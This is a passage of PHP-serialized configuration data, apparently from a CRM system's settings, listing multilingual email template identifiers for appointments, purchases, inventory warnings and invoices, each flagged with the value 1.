;s:34:\"inventory-warning-to-staff-catalan\";i:1;s:33:\"inventory-warning-to-staff-german\";i:1;s:34:\"inventory-warning-to-staff-chinese\";i:1;s:37:\"inventory-warning-to-staff-vietnamese\";i:1;s:36:\"inventory-warning-to-staff-indonesia\";i:1;s:33:\"inventory-warning-to-staff-french\";i:1;s:32:\"inventory-warning-to-staff-czech\";i:1;s:35:\"inventory-warning-to-staff-romanian\";i:1;s:33:\"inventory-warning-to-staff-polish\";i:1;s:36:\"inventory-warning-to-staff-ukrainian\";i:1;s:34:\"inventory-warning-to-staff-persian\";i:1;s:35:\"inventory-warning-to-staff-japanese\";i:1;s:34:\"inventory-warning-to-staff-spanish\";i:1;s:34:\"inventory-warning-to-staff-italian\";i:1;s:33:\"inventory-warning-to-staff-slovak\";i:1;s:40:\"inventory-warning-to-staff-portuguese_br\";i:1;s:33:\"purchase-order-to-contact-swedish\";i:1;s:42:\"appointment-cron-reminder-to-staff-swedish\";i:1;s:38:\"appointment-recurring-to-staff-swedish\";i:1;s:38:\"appointment-cancelled-to-staff-swedish\";i:1;s:40:\"appointment-cancelled-to-contact-swedish\";i:1;s:44:\"appointment-cron-reminder-to-contact-swedish\";i:1;s:41:\"appointment-recurring-to-contacts-swedish\";i:1;s:37:\"appointment-approved-to-staff-swedish\";i:1;s:39:\"appointment-approved-to-contact-swedish\";i:1;s:38:\"appointment-submitted-to-staff-swedish\";i:1;s:34:\"callback-assigned-to-staff-swedish\";i:1;s:38:\"newcallback-requested-to-staff-swedish\";i:1;s:46:\"appointly-appointment-request-feedback-swedish\";i:1;s:47:\"appointly-appointment-feedback-received-swedish\";i:1;s:46:\"appointly-appointment-feedback-updated-swedish\";i:1;s:28:\"send-request-approve-swedish\";i:1;s:21:\"send_rejected-swedish\";i:1;s:20:\"send_approve-swedish\";i:1;s:36:\"purchase-order-to-contact-portuguese\";i:1;s:45:\"appointment-cron-reminder-to-staff-portuguese\";i:1;s:41:\"appointment-recurring-to-staff-portuguese\";i:1;s:41:\"appointment-cancelled-to-staff-portuguese\";i:1;s:43:\"appointment-cancelled-to-contact-portuguese\";i:1;s:47:\"appointment-cron-reminder-to-contact-portuguese\";i:1;s:44:\"appointment-recurring-to-contacts-portuguese\";i:1;s:40:\"appointment-approved-to-staff-portuguese\";i:1;s:42:\"appointment-approved-to-contact-portuguese\";i:1;s:41:\"appointment-submitted-to-staff-portuguese\";i:1;s:37:\"callback-assigned-to-staff-portuguese\";i:1;s:41:\"newcallback-requested-to-staff-portuguese\";i:1;s:49:\"appointly-appointment-request-feedback-portuguese\";i:1;s:50:\"appointly-appointment-feedback-received-portuguese\";i:1;s:49:\"appointly-appointment-feedback-updated-portuguese\";i:1;s:31:\"send-request-approve-portuguese\";i:1;s:24:\"send_rejected-portuguese\";i:1;s:23:\"send_approve-portuguese\";i:1;s:33:\"purchase-order-to-contact-turkish\";i:1;s:42:\"appointment-cron-reminder-to-staff-turkish\";i:1;s:38:\"appointment-recurring-to-staff-turkish\";i:1;s:38:\"appointment-cancelled-to-staff-turkish\";i:1;s:40:\"appointment-cancelled-to-contact-turkish\";i:1;s:44:\"appointment-cron-reminder-to-contact-turkish\";i:1;s:41:\"appointment-recurring-to-contacts-turkish\";i:1;s:37:\"appointment-approved-to-staff-turkish\";i:1;s:39:\"appointment-approved-to-contact-turkish\";i:1;s:38:\"appointment-submitted-to-staff-turkish\";i:1;s:34:\"callback-assigned-to-staff-turkish\";i:1;s:38:\"newcallback-requested-to-staff-turkish\";i:1;s:46:\"appointly-appointment-request-feedback-turkish\";i:1;s:47:\"appointly-appointment-feedback-received-turkish\";i:1;s:46:\"appointly-appointment-feedback-updated-turkish\";i:1;s:28:\"send-request-approve-turkish\";i:1;s:21:\"send_rejected-turkish\";i:1;s:20:\"send_approve-turkish\";i:1;s:35:\"purchase-order-to-contact-bulgarian\";i:1;s:44:\"appointment-cron-reminder-to-staff-bulgarian\";i:1;s:40:\"appointment-recurring-to-staff-bulgarian\";i:1;s:40:\"appointment-cancelled-to-staff-bulgarian\";i:1;s:42:\"appointment-cancelled-to-contact-bulgarian\";i:1;s:46:\"appointment-cron-reminder-to-contact-bulgarian\";i:1;s:43:\"appointment-recurring-to-contacts-bulgarian\";i:1;s:39:\"appointment-approved-to-staff-bulgarian\";i:1;s:41:\"appointment-approved-to-contact-bulgarian\";i:1;s:40:\"appointment-submitted-to-staff-bulgarian\";i:1;s:36:\"callback-assigned-to-staff-bulgarian\";i:1;s:40:\"newcallback-requested-to-staff-bulgarian\";i:1;s:48:\"appointly-appointment-request-feedback-bulgarian\";i:1;s:49:\"appointly-appointment-feedback-received-bulgarian\";i:1;s:48:\"appointly-appointment-feedback-updated-bulgarian\";i:1;s:30:\"send-request-approve-bulgarian\";i:1;s:23:\"send_rejected-bulgarian\";i:1;s:22:\"send_approve-bulgarian\";i:1;s:31:\"purchase-order-to-contact-dutch\";i:1;s:40:\"appointment-cron-reminder-to-staff-dutch\";i:1;s:36:\"appointment-recurring-to-staff-dutch\";i:1;s:36:\"appointment-cancelled-to-staff-dutch\";i:1;s:38:\"appointment-cancelled-to-contact-dutch\";i:1;s:42:\"appointment-cron-reminder-to-contact-dutch\";i:1;s:39:\"appointment-recurring-to-contacts-dutch\";i:1;s:35:\"appointment-approved-to-staff-dutch\";i:1;s:37:\"appointment-approved-to-contact-dutch\";i:1;s:36:\"appointment-submitted-to-staff-dutch\";i:1;s:32:\"callback-assigned-to-staff-dutch\";i:1;s:36:\"newcallback-requested-to-staff-dutch\";i:1;s:44:\"appointly-appointment-request-feedback-dutch\";i:1;s:45:\"appointly-appointment-feedback-received-dutch\";i:1;s:44:\"appointly-appointment-feedback-updated-dutch\";i:1;s:26:\"send-request-approve-dutch\";i:1;s:19:\"send_rejected-dutch\";i:1;s:18:\"send_approve-dutch\";i:1;s:33:\"purchase-order-to-contact-russian\";i:1;s:42:\"appointment-cron-reminder-to-staff-russian\";i:1;s:38:\"appointment-recurring-to-staff-russian\";i:1;s:38:\"appointment-cancelled-to-staff-russian\";i:1;s:40:\"appointment-cancelled-to-contact-russian\";i:1;s:44:\"appointment-cron-reminder-to-contact-russian\";i:1;s:41:\"appointment-recurring-to-contacts-russian\";i:1;s:37:\"appointment-approved-to-staff-russian\";i:1;s:39:\"appointment-approved-to-contact-russian\";i:1;s:38:\"appointment-submitted-to-staff-russian\";i:1;s:34:\"callback-assigned-to-staff-russian\";i:1;s:38:\"newcallback-requested-to-staff-russian\";i:1;s:46:\"appointly-appointment-request-feedback-russian\";i:1;s:47:\"appointly-appointment-feedback-received-russian\";i:1;s:46:\"appointly-appointment-feedback-updated-russian\";i:1;s:28:\"send-request-approve-russian\";i:1;s:21:\"send_rejected-russian\";i:1;s:20:\"send_approve-russian\";i:1;s:31:\"purchase-order-to-contact-greek\";i:1;s:40:\"appointment-cron-reminder-to-staff-greek\";i:1;s:36:\"appointment-recurring-to-staff-greek\";i:1;s:36:\"appointment-cancelled-to-staff-greek\";i:1;s:38:\"appointment-cancelled-to-contact-greek\";i:1;s:42:\"appointment-cron-reminder-to-contact-greek\";i:1;s:39:\"appointment-recurring-to-contacts-greek\";i:1;s:35:\"appointment-approved-to-staff-greek\";i:1;s:37:\"appointment-approved-to-contact-greek\";i:1;s:36:\"appointment-submitted-to-staff-greek\";i:1;s:32:\"callback-assigned-to-staff-greek\";i:1;s:36:\"newcallback-requested-to-staff-greek\";i:1;s:44:\"appointly-appointment-request-feedback-greek\";i:1;s:45:\"appointly-appointment-feedback-received-greek\";i:1;s:44:\"appointly-appointment-feedback-updated-greek\";i:1;s:26:\"send-request-approve-greek\";i:1;s:19:\"send_rejected-greek\";i:1;s:18:\"send_approve-greek\";i:1;s:33:\"purchase-order-to-contact-catalan\";i:1;s:42:\"appointment-cron-reminder-to-staff-catalan\";i:1;s:38:\"appointment-recurring-to-staff-catalan\";i:1;s:38:\"appointment-cancelled-to-staff-catalan\";i:1;s:40:\"appointment-cancelled-to-contact-catalan\";i:1;s:44:\"appointment-cron-reminder-to-contact-catalan\";i:1;s:41:\"appointment-recurring-to-contacts-catalan\";i:1;s:37:\"appointment-approved-to-staff-catalan\";i:1;s:39:\"appointment-approved-to-contact-catalan\";i:1;s:38:\"appointment-submitted-to-staff-catalan\";i:1;s:34:\"callback-assigned-to-staff-catalan\";i:1;s:38:\"newcallback-requested-to-staff-catalan\";i:1;s:46:\"appointly-appointment-request-feedback-catalan\";i:1;s:47:\"appointly-appointment-feedback-received-catalan\";i:1;s:46:\"appointly-appointment-feedback-updated-catalan\";i:1;s:28:\"send-request-approve-catalan\";i:1;s:21:\"send_rejected-catalan\";i:1;s:20:\"send_approve-catalan\";i:1;s:32:\"purchase-order-to-contact-german\";i:1;s:41:\"appointment-cron-reminder-to-staff-german\";i:1;s:37:\"appointment-recurring-to-staff-german\";i:1;s:37:\"appointment-cancelled-to-staff-german\";i:1;s:39:\"appointment-cancelled-to-contact-german\";i:1;s:43:\"appointment-cron-reminder-to-contact-german\";i:1;s:40:\"appointment-recurring-to-contacts-german\";i:1;s:36:\"appointment-approved-to-staff-german\";i:1;s:38:\"appointment-approved-to-contact-german\";i:1;s:37:\"appointment-submitted-to-staff-german\";i:1;s:33:\"callback-assigned-to-staff-german\";i:1;s:37:\"newcallback-requested-to-staff-german\";i:1;s:45:\"appointly-appointment-request-feedback-german\";i:1;s:46:\"appointly-appointment-feedback-received-german\";i:1;s:45:\"appointly-appointment-feedback-updated-german\";i:1;s:27:\"send-request-approve-german\";i:1;s:20:\"send_rejected-german\";i:1;s:19:\"send_approve-german\";i:1;s:33:\"purchase-order-to-contact-chinese\";i:1;s:42:\"appointment-cron-reminder-to-staff-chinese\";i:1;s:38:\"appointment-recurring-to-staff-chinese\";i:1;s:38:\"appointment-cancelled-to-staff-chinese\";i:1;s:40:\"appointment-cancelled-to-contact-chinese\";i:1;s:44:\"appointment-cron-reminder-to-contact-chinese\";i:1;s:41:\"appointment-recurring-to-contacts-chinese\";i:1;s:37:\"appointment-approved-to-staff-chinese\";i:1;s:39:\"appointment-approved-to-contact-chinese\";i:1;s:38:\"appointment-submitted-to-staff-chinese\";i:1;s:34:\"callback-assigned-to-staff-chinese\";i:1;s:38:\"newcallback-requested-to-staff-chinese\";i:1;s:46:\"appointly-appointment-request-feedback-chinese\";i:1;s:47:\"appointly-appointment-feedback-received-chinese\";i:1;s:46:\"appointly-appointment-feedback-updated-chinese\";i:1;s:28:\"send-request-approve-chinese\";i:1;s:21:\"send_rejected-chinese\";i:1;s:20:\"send_approve-chinese\";i:1;s:36:\"purchase-order-to-contact-vietnamese\";i:1;s:45:\"appointment-cron-reminder-to-staff-vietnamese\";i:1;s:41:\"appointment-recurring-to-staff-vietnamese\";i:1;s:41:\"appointment-cancelled-to-staff-vietnamese\";i:1;s:43:\"appointment-cancelled-to-contact-vietnamese\";i:1;s:47:\"appointment-cron-reminder-to-contact-vietnamese\";i:1;s:44:\"appointment-recurring-to-contacts-vietnamese\";i:1;s:40:\"appointment-approved-to-staff-vietnamese\";i:1;s:42:\"appointment-approved-to-contact-vietnamese\";i:1;s:41:\"appointment-submitted-to-staff-vietnamese\";i:1;s:37:\"callback-assigned-to-staff-vietnamese\";i:1;s:41:\"newcallback-requested-to-staff-vietnamese\";i:1;s:49:\"appointly-appointment-request-feedback-vietnamese\";i:1;s:50:\"appointly-appointment-feedback-received-vietnamese\";i:1;s:49:\"appointly-appointment-feedback-updated-vietnamese\";i:1;s:31:\"send-request-approve-vietnamese\";i:1;s:24:\"send_rejected-vietnamese\";i:1;s:23:\"send_approve-vietnamese\";i:1;s:35:\"purchase-order-to-contact-indonesia\";i:1;s:44:\"appointment-cron-reminder-to-staff-indonesia\";i:1;s:40:\"appointment-recurring-to-staff-indonesia\";i:1;s:40:\"appointment-cancelled-to-staff-indonesia\";i:1;s:42:\"appointment-cancelled-to-contact-indonesia\";i:1;s:46:\"appointment-cron-reminder-to-contact-indonesia\";i:1;s:43:\"appointment-recurring-to-contacts-indonesia\";i:1;s:39:\"appointment-approved-to-staff-indonesia\";i:1;s:41:\"appointment-approved-to-contact-indonesia\";i:1;s:40:\"appointment-submitted-to-staff-indonesia\";i:1;s:36:\"callback-assigned-to-staff-indonesia\";i:1;s:40:\"newcallback-requested-to-staff-indonesia\";i:1;s:48:\"appointly-appointment-request-feedback-indonesia\";i:1;s:49:\"appointly-appointment-feedback-received-indonesia\";i:1;s:48:\"appointly-appointment-feedback-updated-indonesia\";i:1;s:30:\"send-request-approve-indonesia\";i:1;s:23:\"send_rejected-indonesia\";i:1;s:22:\"send_approve-indonesia\";i:1;s:32:\"purchase-order-to-contact-french\";i:1;s:41:\"appointment-cron-reminder-to-staff-french\";i:1;s:37:\"appointment-recurring-to-staff-french\";i:1;s:37:\"appointment-cancelled-to-staff-french\";i:1;s:39:\"appointment-cancelled-to-contact-french\";i:1;s:43:\"appointment-cron-reminder-to-contact-french\";i:1;s:40:\"appointment-recurring-to-contacts-french\";i:1;s:36:\"appointment-approved-to-staff-french\";i:1;s:38:\"appointment-approved-to-contact-french\";i:1;s:37:\"appointment-submitted-to-staff-french\";i:1;s:33:\"callback-assigned-to-staff-french\";i:1;s:37:\"newcallback-requested-to-staff-french\";i:1;s:45:\"appointly-appointment-request-feedback-french\";i:1;s:46:\"appointly-appointment-feedback-received-french\";i:1;s:45:\"appointly-appointment-feedback-updated-french\";i:1;s:27:\"send-request-approve-french\";i:1;s:20:\"send_rejected-french\";i:1;s:19:\"send_approve-french\";i:1;s:31:\"purchase-order-to-contact-czech\";i:1;s:40:\"appointment-cron-reminder-to-staff-czech\";i:1;s:36:\"appointment-recurring-to-staff-czech\";i:1;s:36:\"appointment-cancelled-to-staff-czech\";i:1;s:38:\"appointment-cancelled-to-contact-czech\";i:1;s:42:\"appointment-cron-reminder-to-contact-czech\";i:1;s:39:\"appointment-recurring-to-contacts-czech\";i:1;s:35:\"appointment-approved-to-staff-czech\";i:1;s:37:\"appointment-approved-to-contact-czech\";i:1;s:36:\"appointment-submitted-to-staff-czech\";i:1;s:32:\"callback-assigned-to-staff-czech\";i:1;s:36:\"newcallback-requested-to-staff-czech\";i:1;s:44:\"appointly-appointment-request-feedback-czech\";i:1;s:45:\"appointly-appointment-feedback-received-czech\";i:1;s:44:\"appointly-appointment-feedback-updated-czech\";i:1;s:26:\"send-request-approve-czech\";i:1;s:19:\"send_rejected-czech\";i:1;s:18:\"send_approve-czech\";i:1;s:34:\"purchase-order-to-contact-romanian\";i:1;s:43:\"appointment-cron-reminder-to-staff-romanian\";i:1;s:39:\"appointment-recurring-to-staff-romanian\";i:1;s:39:\"appointment-cancelled-to-staff-romanian\";i:1;s:41:\"appointment-cancelled-to-contact-romanian\";i:1;s:45:\"appointment-cron-reminder-to-contact-romanian\";i:1;s:42:\"appointment-recurring-to-contacts-romanian\";i:1;s:38:\"appointment-approved-to-staff-romanian\";i:1;s:40:\"appointment-approved-to-contact-romanian\";i:1;s:39:\"appointment-submitted-to-staff-romanian\";i:1;s:35:\"callback-assigned-to-staff-romanian\";i:1;s:39:\"newcallback-requested-to-staff-romanian\";i:1;s:47:\"appointly-appointment-request-feedback-romanian\";i:1;s:48:\"appointly-appointment-feedback-received-romanian\";i:1;s:47:\"appointly-appointment-feedback-updated-romanian\";i:1;s:29:\"send-request-approve-romanian\";i:1;s:22:\"send_rejected-romanian\";i:1;s:21:\"send_approve-romanian\";i:1;s:32:\"purchase-order-to-contact-polish\";i:1;s:41:\"appointment-cron-reminder-to-staff-polish\";i:1;s:37:\"appointment-recurring-to-staff-polish\";i:1;s:37:\"appointment-cancelled-to-staff-polish\";i:1;s:39:\"appointment-cancelled-to-contact-polish\";i:1;s:43:\"appointment-cron-reminder-to-contact-polish\";i:1;s:40:\"appointment-recurring-to-contacts-polish\";i:1;s:36:\"appointment-approved-to-staff-polish\";i:1;s:38:\"appointment-approved-to-contact-polish\";i:1;s:37:\"appointment-submitted-to-staff-polish\";i:1;s:33:\"callback-assigned-to-staff-polish\";i:1;s:37:\"newcallback-requested-to-staff-polish\";i:1;s:45:\"appointly-appointment-request-feedback-polish\";i:1;s:46:\"appointly-appointment-feedback-received-polish\";i:1;s:45:\"appointly-appointment-feedback-updated-polish\";i:1;s:27:\"send-request-approve-polish\";i:1;s:20:\"send_rejected-polish\";i:1;s:19:\"send_approve-polish\";i:1;s:35:\"purchase-order-to-contact-ukrainian\";i:1;s:44:\"appointment-cron-reminder-to-staff-ukrainian\";i:1;s:40:\"appointment-recurring-to-staff-ukrainian\";i:1;s:40:\"appointment-cancelled-to-staff-ukrainian\";i:1;s:42:\"appointment-cancelled-to-contact-ukrainian\";i:1;s:46:\"appointment-cron-reminder-to-contact-ukrainian\";i:1;s:43:\"appointment-recurring-to-contacts-ukrainian\";i:1;s:39:\"appointment-approved-to-staff-ukrainian\";i:1;s:41:\"appointment-approved-to-contact-ukrainian\";i:1;s:40:\"appointment-submitted-to-staff-ukrainian\";i:1;s:36:\"callback-assigned-to-staff-ukrainian\";i:1;s:40:\"newcallback-requested-to-staff-ukrainian\";i:1;s:48:\"appointly-appointment-request-feedback-ukrainian\";i:1;s:49:\"appointly-appointment-feedback-received-ukrainian\";i:1;s:48:\"appointly-appointment-feedback-updated-ukrainian\";i:1;s:30:\"send-request-approve-ukrainian\";i:1;s:23:\"send_rejected-ukrainian\";i:1;s:22:\"send_approve-ukrainian\";i:1;s:33:\"purchase-order-to-contact-persian\";i:1;s:42:\"appointment-cron-reminder-to-staff-persian\";i:1;s:38:\"appointment-recurring-to-staff-persian\";i:1;s:38:\"appointment-cancelled-to-staff-persian\";i:1;s:40:\"appointment-cancelled-to-contact-persian\";i:1;s:44:\"appointment-cron-reminder-to-contact-persian\";i:1;s:41:\"appointment-recurring-to-contacts-persian\";i:1;s:37:\"appointment-approved-to-staff-persian\";i:1;s:39:\"appointment-approved-to-contact-persian\";i:1;s:38:\"appointment-submitted-to-staff-persian\";i:1;s:34:\"callback-assigned-to-staff-persian\";i:1;s:38:\"newcallback-requested-to-staff-persian\";i:1;s:46:\"appointly-appointment-request-feedback-persian\";i:1;s:47:\"appointly-appointment-feedback-received-persian\";i:1;s:46:\"appointly-appointment-feedback-updated-persian\";i:1;s:28:\"send-request-approve-persian\";i:1;s:21:\"send_rejected-persian\";i:1;s:20:\"send_approve-persian\";i:1;s:34:\"purchase-order-to-contact-japanese\";i:1;s:43:\"appointment-cron-reminder-to-staff-japanese\";i:1;s:39:\"appointment-recurring-to-staff-japanese\";i:1;s:39:\"appointment-cancelled-to-staff-japanese\";i:1;s:41:\"appointment-cancelled-to-contact-japanese\";i:1;s:45:\"appointment-cron-reminder-to-contact-japanese\";i:1;s:42:\"appointment-recurring-to-contacts-japanese\";i:1;s:38:\"appointment-approved-to-staff-japanese\";i:1;s:40:\"appointment-approved-to-contact-japanese\";i:1;s:39:\"appointment-submitted-to-staff-japanese\";i:1;s:35:\"callback-assigned-to-staff-japanese\";i:1;s:39:\"newcallback-requested-to-staff-japanese\";i:1;s:47:\"appointly-appointment-request-feedback-japanese\";i:1;s:48:\"appointly-appointment-feedback-received-japanese\";i:1;s:47:\"appointly-appointment-feedback-updated-japanese\";i:1;s:29:\"send-request-approve-japanese\";i:1;s:22:\"send_rejected-japanese\";i:1;s:21:\"send_approve-japanese\";i:1;s:33:\"purchase-order-to-contact-spanish\";i:1;s:42:\"appointment-cron-reminder-to-staff-spanish\";i:1;s:38:\"appointment-recurring-to-staff-spanish\";i:1;s:38:\"appointment-cancelled-to-staff-spanish\";i:1;s:40:\"appointment-cancelled-to-contact-spanish\";i:1;s:44:\"appointment-cron-reminder-to-contact-spanish\";i:1;s:41:\"appointment-recurring-to-contacts-spanish\";i:1;s:37:\"appointment-approved-to-staff-spanish\";i:1;s:39:\"appointment-approved-to-contact-spanish\";i:1;s:38:\"appointment-submitted-to-staff-spanish\";i:1;s:34:\"callback-assigned-to-staff-spanish\";i:1;s:38:\"newcallback-requested-to-staff-spanish\";i:1;s:46:\"appointly-appointment-request-feedback-spanish\";i:1;s:47:\"appointly-appointment-feedback-received-spanish\";i:1;s:46:\"appointly-appointment-feedback-updated-spanish\";i:1;s:28:\"send-request-approve-spanish\";i:1;s:21:\"send_rejected-spanish\";i:1;s:20:\"send_approve-spanish\";i:1;s:33:\"purchase-order-to-contact-italian\";i:1;s:42:\"appointment-cron-reminder-to-staff-italian\";i:1;s:38:\"appointment-recurring-to-staff-italian\";i:1;s:38:\"appointment-cancelled-to-staff-italian\";i:1;s:40:\"appointment-cancelled-to-contact-italian\";i:1;s:44:\"appointment-cron-reminder-to-contact-italian\";i:1;s:41:\"appointment-recurring-to-contacts-italian\";i:1;s:37:\"appointment-approved-to-staff-italian\";i:1;s:39:\"appointment-approved-to-contact-italian\";i:1;s:38:\"appointment-submitted-to-staff-italian\";i:1;s:34:\"callback-assigned-to-staff-italian\";i:1;s:38:\"newcallback-requested-to-staff-italian\";i:1;s:46:\"appointly-appointment-request-feedback-italian\";i:1;s:47:\"appointly-appointment-feedback-received-italian\";i:1;s:46:\"appointly-appointment-feedback-updated-italian\";i:1;s:28:\"send-request-approve-italian\";i:1;s:21:\"send_rejected-italian\";i:1;s:20:\"send_approve-italian\";i:1;s:32:\"purchase-order-to-contact-slovak\";i:1;s:41:\"appointment-cron-reminder-to-staff-slovak\";i:1;s:37:\"appointment-recurring-to-staff-slovak\";i:1;s:37:\"appointment-cancelled-to-staff-slovak\";i:1;s:39:\"appointment-cancelled-to-contact-slovak\";i:1;s:43:\"appointment-cron-reminder-to-contact-slovak\";i:1;s:40:\"appointment-recurring-to-contacts-slovak\";i:1;s:36:\"appointment-approved-to-staff-slovak\";i:1;s:38:\"appointment-approved-to-contact-slovak\";i:1;s:37:\"appointment-submitted-to-staff-slovak\";i:1;s:33:\"callback-assigned-to-staff-slovak\";i:1;s:37:\"newcallback-requested-to-staff-slovak\";i:1;s:45:\"appointly-appointment-request-feedback-slovak\";i:1;s:46:\"appointly-appointment-feedback-received-slovak\";i:1;s:45:\"appointly-appointment-feedback-updated-slovak\";i:1;s:27:\"send-request-approve-slovak\";i:1;s:20:\"send_rejected-slovak\";i:1;s:19:\"send_approve-slovak\";i:1;s:39:\"purchase-order-to-contact-portuguese_br\";i:1;s:48:\"appointment-cron-reminder-to-staff-portuguese_br\";i:1;s:44:\"appointment-recurring-to-staff-portuguese_br\";i:1;s:44:\"appointment-cancelled-to-staff-portuguese_br\";i:1;s:46:\"appointment-cancelled-to-contact-portuguese_br\";i:1;s:50:\"appointment-cron-reminder-to-contact-portuguese_br\";i:1;s:47:\"appointment-recurring-to-contacts-portuguese_br\";i:1;s:43:\"appointment-approved-to-staff-portuguese_br\";i:1;s:45:\"appointment-approved-to-contact-portuguese_br\";i:1;s:44:\"appointment-submitted-to-staff-portuguese_br\";i:1;s:40:\"callback-assigned-to-staff-portuguese_br\";i:1;s:44:\"newcallback-requested-to-staff-portuguese_br\";i:1;s:52:\"appointly-appointment-request-feedback-portuguese_br\";i:1;s:53:\"appointly-appointment-feedback-received-portuguese_br\";i:1;s:52:\"appointly-appointment-feedback-updated-portuguese_br\";i:1;s:34:\"send-request-approve-portuguese_br\";i:1;s:27:\"send_rejected-portuguese_br\";i:1;s:26:\"send_approve-portuguese_br\";i:1;s:33:\"non-billed-tasks-reminder-swedish\";i:1;s:31:\"invoices-batch-payments-swedish\";i:1;s:36:\"non-billed-tasks-reminder-portuguese\";i:1;s:34:\"invoices-batch-payments-portuguese\";i:1;s:33:\"non-billed-tasks-reminder-turkish\";i:1;s:31:\"invoices-batch-payments-turkish\";i:1;s:35:\"non-billed-tasks-reminder-bulgarian\";i:1;s:33:\"invoices-batch-payments-bulgarian\";i:1;s:31:\"non-billed-tasks-reminder-dutch\";i:1;s:29:\"invoices-batch-payments-dutch\";i:1;s:33:\"non-billed-tasks-reminder-russian\";i:1;s:31:\"invoices-batch-payments-russian\";i:1;s:31:\"non-billed-tasks-reminder-greek\";i:1;s:29:\"invoices-batch-payments-greek\";i:1;s:33:\"non-billed-tasks-reminder-catalan\";i:1;s:31:\"invoices-batch-payments-catalan\";i:1;s:32:\"non-billed-tasks-reminder-german\";i:1;s:30:\"invoices-batch-payments-german\";i:1;s:33:\"non-billed-tasks-reminder-chinese\";i:1;s:31:\"invoices-batch-payments-chinese\";i:1;s:36:\"non-billed-tasks-reminder-vietnamese\";i:1;s:34:\"invoices-batch-payments-vietnamese\";i:1;s:35:\"non-billed-tasks-reminder-indonesia\";i:1;s:33:\"invoices-batch-payments-indonesia\";i:1;s:32:\"non-billed-tasks-reminder-french\";i:1;s:30:\"invoices-batch-payments-french\";i:1;s:31:\"non-billed-tasks-reminder-czech\";i:1;s:29:\"invoices-batch-payments-czech\";i:1;s:34:\"non-billed-tasks-reminder-romanian\";i:1;s:32:\"invoices-batch-payments-romanian\";i:1;s:32:\"non-billed-tasks-reminder-polish\";i:1;s:30:\"invoices-batch-payments-polish\";i:1;s:35:\"non-billed-tasks-reminder-ukrainian\";i:1;s:33:\"invoices-batch-payments-ukrainian\";i:1;s:33:\"non-billed-tasks-reminder-persian\";i:1;s:31:\"invoices-batch-payments-persian\";i:1;s:34:\"non-billed-tasks-reminder-japanese\";i:1;s:32:\"invoices-batch-payments-japanese\";i:1;s:33:\"non-billed-tasks-reminder-spanish\";i:1;s:31:\"invoices-batch-payments-spanish\";i:1;s:33:\"non-billed-tasks-reminder-italian\";i:1;s:31:\"invoices-batch-payments-italian\";i:1;s:32:\"non-billed-tasks-reminder-slovak\";i:1;s:30:\"invoices-batch-payments-slovak\";i:1;s:39:\"non-billed-tasks-reminder-portuguese_br\";i:1;s:37:\"invoices-batch-payments-portuguese_br\";i:1;s:35:\"purchase-request-to-contact-swedish\";i:1;s:37:\"purchase-quotation-to-contact-swedish\";i:1;s:29:\"debit-note-to-contact-swedish\";i:1;s:37:\"purchase-statement-to-contact-swedish\";i:1;s:38:\"purchase-request-to-contact-portuguese\";i:1;s:40:\"purchase-quotation-to-contact-portuguese\";i:1;s:32:\"debit-note-to-contact-portuguese\";i:1;s:40:\"purchase-statement-to-contact-portuguese\";i:1;s:35:\"purchase-request-to-contact-turkish\";i:1;s:37:\"purchase-quotation-to-contact-turkish\";i:1;s:29:\"debit-note-to-contact-turkish\";i:1;s:37:\"purchase-statement-to-contact-turkish\";i:1;s:37:\"purchase-request-to-contact-bulgarian\";i:1;s:39:\"purchase-quotation-to-contact-bulgarian\";i:1;s:31:\"debit-note-to-contact-bulgarian\";i:1;s:39:\"purchase-statement-to-contact-bulgarian\";i:1;s:33:\"purchase-request-to-contact-dutch\";i:1;s:35:\"purchase-quotation-to-contact-dutch\";i:1;s:27:\"debit-note-to-contact-dutch\";i:1;s:35:\"purchase-statement-to-contact-dutch\";i:1;s:35:\"purchase-request-to-contact-russian\";i:1;s:37:\"purchase-quotation-to-contact-russian\";i:1;s:29:\"debit-note-to-contact-russian\";i:1;s:37:\"purchase-statement-to-contact-russian\";i:1;s:33:\"purchase-request-to-contact-greek\";i:1;s:35:\"purchase-quotation-to-contact-greek\";i:1;s:27:\"debit-note-to-contact-greek\";i:1;s:35:\"purchase-statement-to-contact-greek\";i:1;s:35:\"purchase-request-to-contact-catalan\";i:1;s:37:\"purchase-quotation-to-contact-catalan\";i:1;s:29:\"debit-note-to-contact-catalan\";i:1;s:37:\"purchase-statement-to-contact-catalan\";i:1;s:34:\"purchase-request-to-contact-german\";i:1;s:36:\"purchase-quotation-to-contact-german\";i:1;s:28:\"debit-note-to-contact-german\";i:1;s:36:\"purchase-statement-to-contact-german\";i:1;s:35:\"purchase-request-to-contact-chinese\";i:1;s:37:\"purchase-quotation-to-contact-chinese\";i:1;s:29:\"debit-note-to-contact-chinese\";i:1;s:37:\"purchase-statement-to-contact-chinese\";i:1;s:38:\"purchase-request-to-contact-vietnamese\";i:1;s:40:\"purchase-quotation-to-contact-vietnamese\";i:1;s:32:\"debit-note-to-contact-vietnamese\";i:1;s:40:\"purchase-statement-to-contact-vietnamese\";i:1;s:37:\"purchase-request-to-contact-indonesia\";i:1;s:39:\"purchase-quotation-to-contact-indonesia\";i:1;s:31:\"debit-note-to-contact-indonesia\";i:1;s:39:\"purchase-statement-to-contact-indonesia\";i:1;s:34:\"purchase-request-to-contact-french\";i:1;s:36:\"purchase-quotation-to-contact-french\";i:1;s:28:\"debit-note-to-contact-french\";i:1;s:36:\"purchase-statement-to-contact-french\";i:1;s:33:\"purchase-request-to-contact-czech\";i:1;s:35:\"purchase-quotation-to-contact-czech\";i:1;s:27:\"debit-note-to-contact-czech\";i:1;s:35:\"purchase-statement-to-contact-czech\";i:1;s:36:\"purchase-request-to-contact-romanian\";i:1;s:38:\"purchase-quotation-to-contact-romanian\";i:1;s:30:\"debit-note-to-contact-romanian\";i:1;s:38:\"purchase-statement-to-contact-romanian\";i:1;s:34:\"purchase-request-to-contact-polish\";i:1;s:36:\"purchase-quotation-to-contact-polish\";i:1;s:28:\"debit-note-to-contact-polish\";i:1;s:36:\"purchase-statement-to-contact-polish\";i:1;s:37:\"purchase-request-to-contact-ukrainian\";i:1;s:39:\"purchase-quotation-to-contact-ukrainian\";i:1;s:31:\"debit-note-to-contact-ukrainian\";i:1;s:39:\"purchase-statement-to-contact-ukrainian\";i:1;s:35:\"purchase-request-to-contact-persian\";i:1;s:37:\"purchase-quotation-to-contact-persian\";i:1;s:29:\"debit-note-to-contact-persian\";i:1;s:37:\"purchase-statement-to-contact-persian\";i:1;s:36:\"purchase-request-to-contact-japanese\";i:1;s:38:\"purchase-quotation-to-contact-japanese\";i:1;s:30:\"debit-note-to-contact-japanese\";i:1;s:38:\"purchase-statement-to-contact-japanese\";i:1;s:35:\"purchase-request-to-contact-spanish\";i:1